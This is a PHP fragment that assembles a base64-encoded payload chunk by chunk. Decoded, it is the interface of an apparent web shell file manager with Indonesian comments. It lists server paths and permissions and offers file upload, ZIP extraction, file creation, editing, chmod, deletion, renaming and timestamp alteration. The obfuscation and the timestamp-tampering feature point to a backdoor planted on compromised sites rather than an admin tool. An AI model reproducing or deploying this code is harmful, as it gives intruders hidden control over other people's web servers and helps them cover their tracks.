$z .= "AgICAgICAgaWYgKCFlbXB0eSgkcGFy";
$z .= "dCkpIHsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICRjdXJyZW50X3BhdGgg";
$z .= "Lj0gJy8nIC4gJHBhcnQ7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICBlY2hv";
$z .= "ICc8YSBocmVmPSI/X19kX189JyAuIH";
$z .= "VybGVuY29kZSgkY3VycmVudF9wYXRo";
$z .= "KSAuICciIHN0eWxlPSJjb2xvcjojMD";
$z .= "BmZjAwOyB0ZXh0LWRlY29yYXRpb246";
$z .= "bm9uZTsgYm9yZGVyLWJvdHRvbToxcH";
$z .= "ggZGFzaGVkICMwMGZmMDA7IGN1cnNv";
$z .= "cjpwb2ludGVyOyI+JzsNCiAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgIGVjaG8g";
$z .= "aHRtbHNwZWNpYWxjaGFycygkcGFydC";
$z .= "k7DQogICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICBlY2hvICc8L2E+JzsNCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgIA0K";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgLy8gVGFtYmFoa2FuIHNsYXNoIGtl";
$z .= "Y3VhbGkgdW50dWsgYmFnaWFuIHRlcm";
$z .= "FraGlyDQogICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICBpZiAoJGluZGV4IDwgY2";
$z .= "91bnQoJHBhdGhfcGFydHMpIC0gMSkg";
$z .= "ew0KICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgIGVjaG8gJzxzcGFuIHN0";
$z .= "eWxlPSJjb2xvcjojY2NjOyI+Lzwvc3";
$z .= "Bhbj4nOw0KICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgfQ0KICAgICAgICAgIC";
$z .= "AgICAgICAgICB9DQogICAgICAgICAg";
$z .= "ICAgICAgfQ0KICAgICAgICAgICAgIC";
$z .= "AgID8+DQogICAgICAgICAgICA8L3A+";
$z .= "DQogICAgICAgIDwvZGl2Pg0KDQogIC";
$z .= "AgICAgIDwhLS0gSU5GTyBCQVIgKFRB";
$z .= "TUJBSEFOKSAtLT4NCiAgICAgICAgPG";
$z .= "RpdiBjbGFzcz0iaW5mby1iYXIiPg0K";
$z .= "ICAgICAgICAgICAgPHNwYW4+8J+TgS";
$z .= "A8c3Ryb25nPkN1cnJlbnQ6PC9zdHJv";
$z .= "bmc+IDw/cGhwIGVjaG8gaHRtbHNwZW";
$z .= "NpYWxjaGFycygkX19kaXJfXyk7ID8+";
$z .= "PC9zcGFuPg0KICAgICAgICAgICAgPH";
$z .= "NwYW4+8J+TiiA8c3Ryb25nPlBIUDo8";
$z .= "L3N0cm9uZz4gPD9waHAgZWNobyBQSF";
$z .= "BfVkVSU0lPTjsgPz48L3NwYW4+DQog";
$z .= "ICAgICAgICAgICA8c3Bhbj7irIbvuI";
$z .= "8gPHN0cm9uZz5NYXggVXBsb2FkOjwv";
$z .= "c3Ryb25nPiA8P3BocCBlY2hvIGluaV";
$z .= "9nZXQoJ3VwbG9hZF9tYXhfZmlsZXNp";
$z .= "emUnKTsgPz48L3NwYW4+DQogICAgIC";
$z .= "AgICAgICA8c3Bhbj7wn5OdIDxzdHJv";
$z .= "bmc+U3RhdHVzOjwvc3Ryb25nPiA8P3";
$z .= "BocCBlY2hvIGlzX3dyaXRhYmxlKCRf";
$z .= "X2Rpcl9fKSA/ICfinIUgV3JpdGFibG";
$z .= "UnIDogJ+KdjCBSZWFkIE9ubHknOyA/";
$z .= "Pjwvc3Bhbj4NCiAgICAgICAgPC9kaX";
$z .= "Y+DQogICAgICAgIA0KICAgICAgICA8";
$z .= "IS0tIEJSRUFEQ1JVTUIgLS0+DQogIC";
$z .= "AgICAgIDxkaXYgY2xhc3M9ImJyZWFk";
$z .= "Y3J1bWIiPg0KICAgICAgICAgICAgPG";
$z .= "EgaHJlZj0iP19fZF9fPTw/cGhwIGVj";
$z .= "aG8gdXJsZW5jb2RlKGRpcm5hbWUoJF";
$z .= "9fZGlyX18pKTsgPz4iIGNsYXNzPSJi";
$z .= "dG4iPuKGkCBQYXJlbnQ8L2E+DQogIC";
$z .= "AgICAgICAgICA8YSBocmVmPSI/X19k";
$z .= "X189PD9waHAgZWNobyB1cmxlbmNvZG";
$z .= "UoZ2V0Y3dkKCkpOyA/PiIgY2xhc3M9";
$z .= "ImJ0biI+8J+aoiBIb21lPC9hPg0KIC";
$z .= "AgICAgICAgICAgPHNwYW4gc3R5bGU9";
$z .= "ImNvbG9yOiNjY2M7IG1hcmdpbjogMC";
$z .= "A4cHg7Ij58PC9zcGFuPg0KICAgICAg";
$z .= "ICAgICAgPHNwYW4gc3R5bGU9ImNvbG";
$z .= "9yOnZhcigtLWFjY2VudC1nb2xkKTsg";
$z .= "Zm9udC1zaXplOiAxMnB4OyI+PD9waH";
$z .= "AgZWNobyBiYXNlbmFtZSgkX19kaXJf";
$z .= "XykgPzogJy8nOyA/Pjwvc3Bhbj4NCi";
$z .= "AgICAgICAgPC9kaXY+DQogICAgICAg";
$z .= "IA0KICAgICAgICA8IS0tIENPTVBBQ1";
$z .= "QgRk9STSBHUklEIC0tPg0KICAgICAg";
$z .= "ICA8ZGl2IGNsYXNzPSJmb3JtLWdyaW";
$z .= "QiPg0KICAgICAgICAgICAgPCEtLSBV";
$z .= "UExPQUQgRklMRSAtLT4NCiAgICAgIC";
$z .= "AgICAgIDxkaXYgY2xhc3M9ImZvcm0t";
$z .= "Ym94IiBpZD0idXBsb2FkIj4NCiAgIC";
$z .= "AgICAgICAgICAgICA8aDM+8J+aoiBV";
$z .= "cGxvYWQgRmlsZTwvaDM+DQogICAgIC";
$z .= "AgICAgICAgICAgPGZvcm0gbWV0aG9k";
$z .= "PSJwb3N0IiBlbmN0eXBlPSJtdWx0aX";
$z .= "BhcnQvZm9ybS1kYXRhIj4NCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgPGlucHV0IH";
$z .= "R5cGU9ImZpbGUiIG5hbWU9Il9fdXBf";
$z .= "XyIgcmVxdWlyZWQ+DQogICAgICAgIC";
$z .= "AgICAgICAgICAgIDxidXR0b24gdHlw";
$z .= "ZT0ic3VibWl0IiBjbGFzcz0iYnRuIj";
$z .= "5VcGxvYWQ8L2J1dHRvbj4NCiAgICAg";
$z .= "ICAgICAgICAgICA8L2Zvcm0+DQogIC";
$z .= "AgICAgICAgICA8L2Rpdj4NCiAgICAg";
$z .= "ICAgICAgIA0KICAgICAgICAgICAgPC";
$z .= "EtLSBVUExPQUQgJiBFWFRSQUNUIFpJ";
$z .= "UCAtLT4NCiAgICAgICAgICAgIDxkaX";
$z .= "YgY2xhc3M9ImZvcm0tYm94IiBpZD0i";
$z .= "emlwIj4NCiAgICAgICAgICAgICAgIC";
$z .= "A8aDM+8J+SgCBVcGxvYWQgJiBFeHRy";
$z .= "YWN0IFpJUDwvaDM+DQogICAgICAgIC";
$z .= "AgICAgICAgPGZvcm0gbWV0aG9kPSJw";
$z .= "b3N0IiBlbmN0eXBlPSJtdWx0aXBhcn";
$z .= "QvZm9ybS1kYXRhIj4NCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgPGlucHV0IHR5cG";
$z .= "U9ImZpbGUiIG5hbWU9Il9femlwX18i";
$z .= "IGFjY2VwdD0iLnppcCIgcmVxdWlyZW";
$z .= "Q+DQogICAgICAgICAgICAgICAgICAg";
$z .= "IDxidXR0b24gdHlwZT0ic3VibWl0Ii";
$z .= "BjbGFzcz0iYnRuIGJ0bi1leHRyYWN0";
$z .= "Ij5VcGxvYWQgJiBFeHRyYWN0PC9idX";
$z .= "R0b24+DQogICAgICAgICAgICAgICAg";
$z .= "PC9mb3JtPg0KICAgICAgICAgICAgPC";
$z .= "9kaXY+DQogICAgICAgICAgICANCiAg";
$z .= "ICAgICAgICAgIDwhLS0gQ1JFQVRFIE";
$z .= "ZJTEUvRk9MREVSIC0tPg0KICAgICAg";
$z .= "ICAgICAgPGRpdiBjbGFzcz0iZm9ybS";
$z .= "1ib3giIGlkPSJjcmVhdGUiPg0KICAg";
$z .= "ICAgICAgICAgICAgIDxoMz7inpUgQ3";
$z .= "JlYXRlIE5ldzwvaDM+DQogICAgICAg";
$z .= "ICAgICAgICAgPGZvcm0gbWV0aG9kPS";
$z .= "Jwb3N0Ij4NCiAgICAgICAgICAgICAg";
$z .= "ICAgICAgPGlucHV0IHR5cGU9InRleH";
$z .= "QiIG5hbWU9Il9fbmFtZV9fIiBwbGFj";
$z .= "ZWhvbGRlcj0iTmFtZSIgcmVxdWlyZW";
$z .= "Q+DQogICAgICAgICAgICAgICAgICAg";
$z .= "IDxzZWxlY3QgbmFtZT0iX190eXBlX1";
$z .= "8iPg0KICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgPG9wdGlvbiB2YWx1ZT0iZm";
$z .= "lsZSI+8J+ThCBGaWxlPC9vcHRpb24+";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICA8b3B0aW9uIHZhbHVlPSJmb2xk";
$z .= "ZXIiPvCfk4EgRm9sZGVyPC9vcHRpb2";
$z .= "4+DQogICAgICAgICAgICAgICAgICAg";
$z .= "IDwvc2VsZWN0Pg0KICAgICAgICAgIC";
$z .= "AgICAgICAgICA8dGV4dGFyZWEgbmFt";
$z .= "ZT0iX19kYXRhX18iIHBsYWNlaG9sZG";
$z .= "VyPSJDb250ZW50IChmb3IgZmlsZXMp";
$z .= "IiByb3dzPSIyIj48L3RleHRhcmVhPg";
$z .= "0KICAgICAgICAgICAgICAgICAgICA8";
$z .= "aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW";
$z .= "1lPSJfX2NyZWF0ZV9fIiB2YWx1ZT0i";
$z .= "MSI+DQogICAgICAgICAgICAgICAgIC";
$z .= "AgIDxidXR0b24gdHlwZT0ic3VibWl0";
$z .= "IiBjbGFzcz0iYnRuIj5DcmVhdGU8L2";
$z .= "J1dHRvbj4NCiAgICAgICAgICAgICAg";
$z .= "ICA8L2Zvcm0+DQogICAgICAgICAgIC";
$z .= "A8L2Rpdj4NCiAgICAgICAgPC9kaXY+";
$z .= "DQogICAgICAgIA0KICAgICAgICA8IS";
$z .= "0tIEZJTEUgTElTVCAtLT4NCiAgICAg";
$z .= "ICAgPHRhYmxlIGNsYXNzPSJmaWxlLX";
$z .= "RhYmxlIj4NCiAgICAgICAgICAgIDx0";
$z .= "aGVhZD4NCiAgICAgICAgICAgICAgIC";
$z .= "A8dHI+DQogICAgICAgICAgICAgICAg";
$z .= "ICAgIDx0aD5OYW1lPC90aD4NCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgPHRoPlNp";
$z .= "emU8L3RoPg0KICAgICAgICAgICAgIC";
$z .= "AgICAgICA8dGg+UGVybWlzc2lvbnM8";
$z .= "L3RoPg0KICAgICAgICAgICAgICAgIC";
$z .= "AgICA8dGg+TW9kaWZpZWQ8L3RoPg0K";
$z .= "ICAgICAgICAgICAgICAgICAgICA8dG";
$z .= "g+QWN0aW9uczwvdGg+DQogICAgICAg";
$z .= "ICAgICAgICAgICAgIDx0aD5SZW5hbW";
$z .= "U8L3RoPg0KICAgICAgICAgICAgICAg";
$z .= "IDwvdHI+DQogICAgICAgICAgICA8L3";
$z .= "RoZWFkPg0KICAgICAgICAgICAgPHRi";
$z .= "b2R5Pg0KICAgICAgICAgICAgICAgID";
$z .= "w/cGhwDQogICAgICAgICAgICAgICAg";
$z .= "JF9faXRlbXNfXyA9IHNjYW5kaXIoJF";
$z .= "9fZGlyX18pOw0KICAgICAgICAgICAg";
$z .= "ICAgIA0KICAgICAgICAgICAgICAgIC";
$z .= "8vIFBpc2Foa2FuIGZvbGRlciBkYW4g";
$z .= "ZmlsZQ0KICAgICAgICAgICAgICAgIC";
$z .= "Rmb2xkZXJzID0gW107DQogICAgICAg";
$z .= "ICAgICAgICAgJGZpbGVzID0gW107DQ";
$z .= "ogICAgICAgICAgICAgICAgDQogICAg";
$z .= "ICAgICAgICAgICAgZm9yZWFjaCAoJF";
$z .= "9faXRlbXNfXyBhcyAkX19pdGVtX18p";
$z .= "IHsNCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgaWYgKCRfX2l0ZW1fXyA9PSAnLicg";
$z .= "fHwgJF9faXRlbV9fID09ICcuLicpIG";
$z .= "NvbnRpbnVlOw0KICAgICAgICAgICAg";
$z .= "ICAgICAgICANCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgJF9fcGF0aF9fID0gJF9f";
$z .= "ZGlyX18gLiAnLycgLiAkX19pdGVtX1";
$z .= "87DQogICAgICAgICAgICAgICAgICAg";
$z .= "ICRfX2lzX2Rpcl9fID0gaXNfZGlyKC";
$z .= "RfX3BhdGhfXyk7DQogICAgICAgICAg";
$z .= "ICAgICAgICAgIA0KICAgICAgICAgIC";
$z .= "AgICAgICAgICBpZiAoJF9faXNfZGly";
$z .= "X18pIHsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICRmb2xkZXJzW10gPSAk";
$z .= "X19pdGVtX187DQogICAgICAgICAgIC";
$z .= "AgICAgICAgIH0gZWxzZSB7DQogICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAkZm";
$z .= "lsZXNbXSA9ICRfX2l0ZW1fXzsNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgfQ0KIC";
$z .= "AgICAgICAgICAgICAgIH0NCiAgICAg";
$z .= "ICAgICAgICAgICANCiAgICAgICAgIC";
$z .= "AgICAgICAvLyBUYW1waWxrYW4gZm9s";
$z .= "ZGVyIHRlcmxlYmloIGRhaHVsdQ0KIC";
$z .= "AgICAgICAgICAgICAgIGZvcmVhY2gg";
$z .= "KCRmb2xkZXJzIGFzICRfX2l0ZW1fXy";
$z .= "kgew0KICAgICAgICAgICAgICAgICAg";
$z .= "ICAkX19wYXRoX18gPSAkX19kaXJfXy";
$z .= "AuICcvJyAuICRfX2l0ZW1fXzsNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgJF9fc2";
$z .= "l6ZV9fID0gJy0nOw0KICAgICAgICAg";
$z .= "ICAgICAgICAgICAkX19wZXJtX29jdG";
$z .= "FsX18gPSBzdWJzdHIoc3ByaW50Zign";
$z .= "JW8nLCBmaWxlcGVybXMoJF9fcGF0aF";
$z .= "9fKSksIC00KTsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgJF9fcGVybV9zdHJfXy";
$z .= "A9IF9fZ2V0X3Blcm0oJF9fcGF0aF9f";
$z .= "KTsNCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgJF9fd3JpdGFibGVfXyA9IF9faXNf";
$z .= "d3JpdGFibGUoJF9fcGF0aF9fKTsNCi";
$z .= "AgICAgICAgICAgICAgICAgICAgJF9f";
$z .= "cGVybV9jb2xvcl9fID0gX19wZXJtX2";
$z .= "NvbG9yKCRfX3Blcm1fb2N0YWxfXywg";
$z .= "JF9fd3JpdGFibGVfXyk7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgICRfX21vZGlm";
$z .= "aWVkX18gPSBkYXRlKCdZLW0tZCBIOm";
$z .= "knLCBmaWxlbXRpbWUoJF9fcGF0aF9f";
$z .= "KSk7DQogICAgICAgICAgICAgICAgIC";
$z .= "AgIA0KICAgICAgICAgICAgICAgICAg";
$z .= "ICBlY2hvICc8dHI+JzsNCiAgICAgIC";
$z .= "AgICAgICAgICAgICAgDQogICAgICAg";
$z .= "ICAgICAgICAgICAgIC8vIE5hbWUgLS";
$z .= "BGb2xkZXIgZGVuZ2FuIHdhcm5hIGhp";
$z .= "amF1DQogICAgICAgICAgICAgICAgIC";
$z .= "AgIGVjaG8gJzx0ZCBjbGFzcz0iZm9s";
$z .= "ZGVyLW5hbWUiPic7DQogICAgICAgIC";
$z .= "AgICAgICAgICAgIGVjaG8gJ/Cfk4Eg";
$z .= "JzsNCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgZWNobyAnPGEgaHJlZj0iP19fZF9f";
$z .= "PScgLiB1cmxlbmNvZGUoJF9fcGF0aF";
$z .= "9fKSAuICciIHN0eWxlPSJjb2xvcjoj";
$z .= "MDBmZjAwO2ZvbnQtd2VpZ2h0OmJvbG";
$z .= "Q7dGV4dC1kZWNvcmF0aW9uOm5vbmU7";
$z .= "Ij4nIC4gaHRtbHNwZWNpYWxjaGFycy";
$z .= "gkX19pdGVtX18pIC4gJzwvYT4nOw0K";
$z .= "ICAgICAgICAgICAgICAgICAgICBlY2";
$z .= "hvICc8L3RkPic7DQogICAgICAgICAg";
$z .= "ICAgICAgICAgIA0KICAgICAgICAgIC";
$z .= "AgICAgICAgICAvLyBTaXplDQogICAg";
$z .= "ICAgICAgICAgICAgICAgIGVjaG8gJz";
$z .= "x0ZD48c3BhbiBzdHlsZT0iZm9udC1z";
$z .= "aXplOjExcHg7Ij4nIC4gJF9fc2l6ZV";
$z .= "9fIC4gJzwvc3Bhbj48L3RkPic7DQog";
$z .= "ICAgICAgICAgICAgICAgICAgIA0KIC";
$z .= "AgICAgICAgICAgICAgICAgICAvLyBQ";
$z .= "ZXJtaXNzaW9ucw0KICAgICAgICAgIC";
$z .= "AgICAgICAgICBlY2hvICc8dGQ+JzsN";
$z .= "CiAgICAgICAgICAgICAgICAgICAgZW";
$z .= "NobyAnPHNwYW4gY2xhc3M9InBlcm0t";
$z .= "YmFkZ2UiIHN0eWxlPSJjb2xvcjonIC";
$z .= "4gJF9fcGVybV9jb2xvcl9fIC4gJzti";
$z .= "b3JkZXItY29sb3I6JyAuICRfX3Blcm";
$z .= "1fY29sb3JfXyAuICc7Ij4nIC4gJF9f";
$z .= "cGVybV9zdHJfXyAuICc8L3NwYW4+Jz";
$z .= "sNCiAgICAgICAgICAgICAgICAgICAg";
$z .= "ZWNobyAnPGJyPjxzbWFsbCBzdHlsZT";
$z .= "0iY29sb3I6Izg4ODtmb250LXNpemU6";
$z .= "MTBweDttYXJnaW4tdG9wOjNweDtkaX";
$z .= "NwbGF5OmlubGluZS1ibG9jazsiPign";
$z .= "IC4gJF9fcGVybV9vY3RhbF9fIC4gJy";
$z .= "k8L3NtYWxsPic7DQogICAgICAgICAg";
$z .= "ICAgICAgICAgIGVjaG8gJzwvdGQ+Jz";
$z .= "sNCiAgICAgICAgICAgICAgICAgICAg";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "8vIE1vZGlmaWVkDQogICAgICAgICAg";
$z .= "ICAgICAgICAgIGVjaG8gJzx0ZD48c3";
$z .= "BhbiBzdHlsZT0iZm9udC1zaXplOjEx";
$z .= "cHg7Ij4nIC4gJF9fbW9kaWZpZWRfXy";
$z .= "AuICc8L3NwYW4+PC90ZD4nOw0KICAg";
$z .= "ICAgICAgICAgICAgICAgICANCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgLy8gQWN0";
$z .= "aW9ucw0KICAgICAgICAgICAgICAgIC";
$z .= "AgICBlY2hvICc8dGQ+JzsNCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgZWNobyAnPG";
$z .= "RpdiBjbGFzcz0iYWN0aW9uLWJ1dHRv";
$z .= "bnMiPic7DQogICAgICAgICAgICAgIC";
$z .= "AgICAgIGVjaG8gJzxhIGhyZWY9Ij9f";
$z .= "X2RfXz0nIC4gdXJsZW5jb2RlKCRfX2";
$z .= "Rpcl9fKSAuICcmX190b3VjaF9fPScg";
$z .= "LiB1cmxlbmNvZGUoJF9faXRlbV9fKS";
$z .= "AuICciIGNsYXNzPSJidG4gYnRuLXRp";
$z .= "bWVzdGFtcCIgdGl0bGU9IkVkaXQgVG";
$z .= "ltZXN0YW1wIj7wn5WSIFRpbWU8L2E+";
$z .= "JzsNCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgZWNobyAnPGEgaHJlZj0iP19fZF9f";
$z .= "PScgLiB1cmxlbmNvZGUoJF9fZGlyX1";
$z .= "8pIC4gJyZfX2NobW9kX189JyAuIHVy";
$z .= "bGVuY29kZSgkX19pdGVtX18pIC4gJy";
$z .= "IgY2xhc3M9ImJ0biBidG4tY2htb2Qi";
$z .= "PvCflKcgQ2htb2Q8L2E+JzsNCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgZWNobyAn";
$z .= "PGEgaHJlZj0iP19fZF9fPScgLiB1cm";
$z .= "xlbmNvZGUoJF9fZGlyX18pIC4gJyZf";
$z .= "X2RlbF9fPScgLiB1cmxlbmNvZGUoJF";
$z .= "9faXRlbV9fKSAuICciIG9uY2xpY2s9";
$z .= "InJldHVybiBjb25maXJtKFwnRGVsZX";
$z .= "RlICcgLiBodG1sc3BlY2lhbGNoYXJz";
$z .= "KCRfX2l0ZW1fXykgLiAnP1wnKSIgY2";
$z .= "xhc3M9ImJ0biBidG4tZGVsZXRlIj7w";
$z .= "n5eRIERlbGV0ZTwvYT4nOw0KICAgIC";
$z .= "AgICAgICAgICAgICAgICBlY2hvICc8";
$z .= "L2Rpdj4nOw0KICAgICAgICAgICAgIC";
$z .= "AgICAgICBlY2hvICc8L3RkPic7DQog";
$z .= "ICAgICAgICAgICAgICAgICAgIA0KIC";
$z .= "AgICAgICAgICAgICAgICAgICAvLyBS";
$z .= "ZW5hbWUgQ29sdW1uDQogICAgICAgIC";
$z .= "AgICAgICAgICAgIGVjaG8gJzx0ZD4n";
$z .= "Ow0KICAgICAgICAgICAgICAgICAgIC";
$z .= "BlY2hvICc8YSBocmVmPSI/X19kX189";
$z .= "JyAuIHVybGVuY29kZSgkX19kaXJfXy";
$z .= "kgLiAnJl9fcmVuYW1lX189JyAuIHVy";
$z .= "bGVuY29kZSgkX19pdGVtX18pIC4gJy";
$z .= "IgY2xhc3M9ImJ0biBidG4tcmVuYW1l";
$z .= "Ij7wn5OdIFJlbmFtZTwvYT4nOw0KIC";
$z .= "AgICAgICAgICAgICAgICAgICBlY2hv";
$z .= "ICc8L3RkPic7DQogICAgICAgICAgIC";
$z .= "AgICAgICAgIA0KICAgICAgICAgICAg";
$z .= "ICAgICAgICBlY2hvICc8L3RyPic7DQ";
$z .= "ogICAgICAgICAgICAgICAgfQ0KICAg";
$z .= "ICAgICAgICAgICAgIA0KICAgICAgIC";
$z .= "AgICAgICAgIC8vIFRhbXBpbGthbiBm";
$z .= "aWxlIHNldGVsYWggZm9sZGVyDQogIC";
$z .= "AgICAgICAgICAgICAgZm9yZWFjaCAo";
$z .= "JGZpbGVzIGFzICRfX2l0ZW1fXykgew";
$z .= "0KICAgICAgICAgICAgICAgICAgICAk";
$z .= "X19wYXRoX18gPSAkX19kaXJfXyAuIC";
$z .= "cvJyAuICRfX2l0ZW1fXzsNCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgJF9fc2l6ZV";
$z .= "9fID0gX19mb3JtYXRfc2l6ZShmaWxl";
$z .= "c2l6ZSgkX19wYXRoX18pKTsNCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgJF9fcGVy";
$z .= "bV9vY3RhbF9fID0gc3Vic3RyKHNwcm";
$z .= "ludGYoJyVvJywgZmlsZXBlcm1zKCRf";
$z .= "X3BhdGhfXykpLCAtNCk7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgICRfX3Blcm1f";
$z .= "c3RyX18gPSBfX2dldF9wZXJtKCRfX3";
$z .= "BhdGhfXyk7DQogICAgICAgICAgICAg";
$z .= "ICAgICAgICRfX3dyaXRhYmxlX18gPS";
$z .= "BfX2lzX3dyaXRhYmxlKCRfX3BhdGhf";
$z .= "Xyk7DQogICAgICAgICAgICAgICAgIC";
$z .= "AgICRfX3Blcm1fY29sb3JfXyA9IF9f";
$z .= "cGVybV9jb2xvcigkX19wZXJtX29jdG";
$z .= "FsX18sICRfX3dyaXRhYmxlX18pOw0K";
$z .= "ICAgICAgICAgICAgICAgICAgICAkX1";
$z .= "9tb2RpZmllZF9fID0gZGF0ZSgnWS1t";
$z .= "LWQgSDppJywgZmlsZW10aW1lKCRfX3";
$z .= "BhdGhfXykpOw0KICAgICAgICAgICAg";
$z .= "ICAgICAgICANCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgZWNobyAnPHRyPic7DQog";
$z .= "ICAgICAgICAgICAgICAgICAgIA0KIC";
$z .= "AgICAgICAgICAgICAgICAgICAvLyBO";
$z .= "YW1lDQogICAgICAgICAgICAgICAgIC";
$z .= "AgIGVjaG8gJzx0ZCBjbGFzcz0iZmls";
$z .= "ZS1uYW1lIj4nOw0KICAgICAgICAgIC";
$z .= "AgICAgICAgICBlY2hvICfwn5OEICc7";
$z .= "DQogICAgICAgICAgICAgICAgICAgIG";
$z .= "VjaG8gJzxzcGFuPicgLiBodG1sc3Bl";
$z .= "Y2lhbGNoYXJzKCRfX2l0ZW1fXykgLi";
$z .= "AnPC9zcGFuPic7DQogICAgICAgICAg";
$z .= "ICAgICAgICAgIGVjaG8gJzwvdGQ+Jz";
$z .= "sNCiAgICAgICAgICAgICAgICAgICAg";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "8vIFNpemUNCiAgICAgICAgICAgICAg";
$z .= "ICAgICAgZWNobyAnPHRkPjxzcGFuIH";
$z .= "N0eWxlPSJmb250LXNpemU6MTFweDsi";
$z .= "PicgLiAkX19zaXplX18gLiAnPC9zcG";
$z .= "FuPjwvdGQ+JzsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgDQogICAgICAgICAgIC";
$z .= "AgICAgICAgIC8vIFBlcm1pc3Npb25z";
$z .= "DQogICAgICAgICAgICAgICAgICAgIG";
$z .= "VjaG8gJzx0ZD4nOw0KICAgICAgICAg";
$z .= "ICAgICAgICAgICBlY2hvICc8c3Bhbi";
$z .= "BjbGFzcz0icGVybS1iYWRnZSIgc3R5";
$z .= "bGU9ImNvbG9yOicgLiAkX19wZXJtX2";
$z .= "NvbG9yX18gLiAnO2JvcmRlci1jb2xv";
$z .= "cjonIC4gJF9fcGVybV9jb2xvcl9fIC";
$z .= "4gJzsiPicgLiAkX19wZXJtX3N0cl9f";
$z .= "IC4gJzwvc3Bhbj4nOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICBlY2hvICc8YnI+";
$z .= "PHNtYWxsIHN0eWxlPSJjb2xvcjojOD";
$z .= "g4O2ZvbnQtc2l6ZToxMHB4O21hcmdp";
$z .= "bi10b3A6M3B4O2Rpc3BsYXk6aW5saW";
$z .= "5lLWJsb2NrOyI+KCcgLiAkX19wZXJt";
$z .= "X29jdGFsX18gLiAnKTwvc21hbGw+Jz";
$z .= "sNCiAgICAgICAgICAgICAgICAgICAg";
$z .= "ZWNobyAnPC90ZD4nOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICANCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgLy8gTW9kaWZpZW";
$z .= "QNCiAgICAgICAgICAgICAgICAgICAg";
$z .= "ZWNobyAnPHRkPjxzcGFuIHN0eWxlPS";
$z .= "Jmb250LXNpemU6MTFweDsiPicgLiAk";
$z .= "X19tb2RpZmllZF9fIC4gJzwvc3Bhbj";
$z .= "48L3RkPic7DQogICAgICAgICAgICAg";
$z .= "ICAgICAgIA0KICAgICAgICAgICAgIC";
$z .= "AgICAgICAvLyBBY3Rpb25zDQogICAg";
$z .= "ICAgICAgICAgICAgICAgIGVjaG8gJz";
$z .= "x0ZD4nOw0KICAgICAgICAgICAgICAg";
$z .= "ICAgICBlY2hvICc8ZGl2IGNsYXNzPS";
$z .= "JhY3Rpb24tYnV0dG9ucyI+JzsNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgZWNoby";
$z .= "AnPGEgaHJlZj0iP19fZF9fPScgLiB1";
$z .= "cmxlbmNvZGUoJF9fZGlyX18pIC4gJy";
$z .= "ZfX2VkaXRfXz0nIC4gdXJsZW5jb2Rl";
$z .= "KCRfX2l0ZW1fXykgLiAnIiBjbGFzcz";
$z .= "0iYnRuIGJ0bi1lZGl0Ij7inI/vuI8g";
$z .= "RWRpdDwvYT4nOw0KICAgICAgICAgIC";
$z .= "AgICAgICAgICBlY2hvICc8YSBocmVm";
$z .= "PSI/X19kX189JyAuIHVybGVuY29kZS";
$z .= "gkX19kaXJfXykgLiAnJl9fdG91Y2hf";
$z .= "Xz0nIC4gdXJsZW5jb2RlKCRfX2l0ZW";
$z .= "1fXykgLiAnIiBjbGFzcz0iYnRuIGJ0";
$z .= "bi10aW1lc3RhbXAiIHRpdGxlPSJFZG";
$z .= "l0IFRpbWVzdGFtcCI+8J+VkiBUaW1l";
$z .= "PC9hPic7DQogICAgICAgICAgICAgIC";
$z .= "AgICAgIGVjaG8gJzxhIGhyZWY9Ij9f";
$z .= "X2RfXz0nIC4gdXJsZW5jb2RlKCRfX2";
$z .= "Rpcl9fKSAuICcmX19jaG1vZF9fPScg";
$z .= "LiB1cmxlbmNvZGUoJF9faXRlbV9fKS";
$z .= "AuICciIGNsYXNzPSJidG4gYnRuLWNo";
$z .= "bW9kIj7wn5SnIENobW9kPC9hPic7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgIGVj";
$z .= "aG8gJzxhIGhyZWY9Ij9fX2RfXz0nIC";
$z .= "4gdXJsZW5jb2RlKCRfX2Rpcl9fKSAu";
$z .= "ICcmX19kZWxfXz0nIC4gdXJsZW5jb2";
$z .= "RlKCRfX2l0ZW1fXykgLiAnIiBvbmNs";
$z .= "aWNrPSJyZXR1cm4gY29uZmlybShcJ0";
$z .= "RlbGV0ZSAnIC4gaHRtbHNwZWNpYWxj";
$z .= "aGFycygkX19pdGVtX18pIC4gJz9cJy";
$z .= "kiIGNsYXNzPSJidG4gYnRuLWRlbGV0";
$z .= "ZSI+4pig77iPIERlbGV0ZTwvYT4nOw";
